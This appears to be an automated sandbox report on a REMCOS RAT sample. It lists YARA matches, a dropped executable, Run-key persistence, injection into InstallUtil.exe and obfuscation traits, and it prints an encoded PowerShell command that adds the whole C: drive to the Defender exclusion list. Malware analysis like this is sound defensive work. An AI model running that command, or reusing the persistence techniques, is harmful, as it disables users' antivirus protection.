Source: 0000001A.00000002.595851570.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001C.00000000.606295959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000001C.00000000.606295959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda

Found potential string decryption / allocating functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: String function: 004310BE appears 38 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: String function: 00402053 appears 50 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: String function: 00431740 appears 53 times

Contains functionality to call native functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

17_2_00414EA8

Sample file is different than original file name gathered from version info

Source: kyFBQxVbsg.exe, 00000000.00000002.540743790.0000000003687000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWoctlxtjcvxsj.dll" vs kyFBQxVbsg.exe
Source: kyFBQxVbsg.exe, 00000000.00000003.526374372.0000000003850000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWoctlxtjcvxsj.dll" vs kyFBQxVbsg.exe
Source: kyFBQxVbsg.exe, 00000000.00000000.371796335.0000000000392000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamerc.exe4 vs kyFBQxVbsg.exe
Source: kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs kyFBQxVbsg.exe
Source: kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs kyFBQxVbsg.exe
Source: kyFBQxVbsg.exe	Binary or memory string: OriginalFilenamerc.exe4 vs kyFBQxVbsg.exe

Source: kyFBQxVbsg.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Qerdo.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: kyFBQxVbsg.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe

File created: C:\Users\user\AppData\Roaming\Ppjollp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@18/10@117/1

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_004172C8 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

17_2_004172C8

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_00417CBB FindResourceA,LoadResource,LockResource,SizeofResource,

17_2_00417CBB

Source: kyFBQxVbsg.exe	Virustotal: Detection: 46%
Source: kyFBQxVbsg.exe	ReversingLabs: Detection: 57%

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe

File read: C:\Users\user\Desktop\kyFBQxVbsg.exe

Jump to behavior

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\kyFBQxVbsg.exe "C:\Users\user\Desktop\kyFBQxVbsg.exe"
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwADsAIABTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJwBDADoAXAAnAA==
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe "C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe "C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe"
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwADsAIABTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJwBDADoAXAAnAA==	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_00414706 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,

17_2_00414706

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_esjq1xkt.ffx.ps1

Jump to behavior

Source: kyFBQxVbsg.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_0040D3C8 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,

17_2_0040D3C8

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6424:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Mutant created: \Sessions\1\BaseNamedObjects\cvxyttydfsgbghfgfhtd-RXTSAM

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: kyFBQxVbsg.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: kyFBQxVbsg.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: protobuf-net.pdbSHA256 source: kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Yara detected Costura Assembly Loader

Source: Yara match	File source: 24.2.Qerdo.exe.5440000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.Qerdo.exe.48f0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.Qerdo.exe.48f0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.kyFBQxVbsg.exe.4ba0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.kyFBQxVbsg.exe.4ba0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.Qerdo.exe.5440000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.526374372.0000000003850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.597952189.000000000239C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.606363285.00000000048F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.540068634.000000000269C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.541870137.0000000004BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.587908821.0000000004060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.581326592.0000000003550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.610776047.0000000002EAC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.613026227.0000000005440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: kyFBQxVbsg.exe PID: 6232, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Qerdo.exe PID: 6216, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Qerdo.exe PID: 5652, type: MEMORYSTR

.NET source code contains potential unpacker

Source: kyFBQxVbsg.exe, hlrc.cs	.Net Code: qmvy System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 19.2.Qerdo.exe.40000.0.unpack, hlrc.cs	.Net Code: qmvy System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Code function: 0_2_024A2827 push ebx; ret	0_2_024A287A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00C8FF5F push es; ret	3_2_00C8FF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_004594FD push esi; ret	17_2_00459506
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00431786 push ecx; ret	17_2_00431799
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00453798 push eax; ret	17_2_004537B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00452E76 push ecx; ret	17_2_00452E89

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

17_2_0040CE58

Source: initial sample	Static PE information: section name: .text entropy: 7.9984009418791
Source: initial sample	Static PE information: section name: .text entropy: 7.9984009418791

Drops PE files

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe

File created: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe

Jump to dropped file

Contains functionality to download and launch executables

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_00405CE1 ShellExecuteW,URLDownloadToFileW,

17_2_00405CE1

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Qerdo			Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Qerdo			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_004172C8 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

17_2_004172C8

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

17_2_0040CE58

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
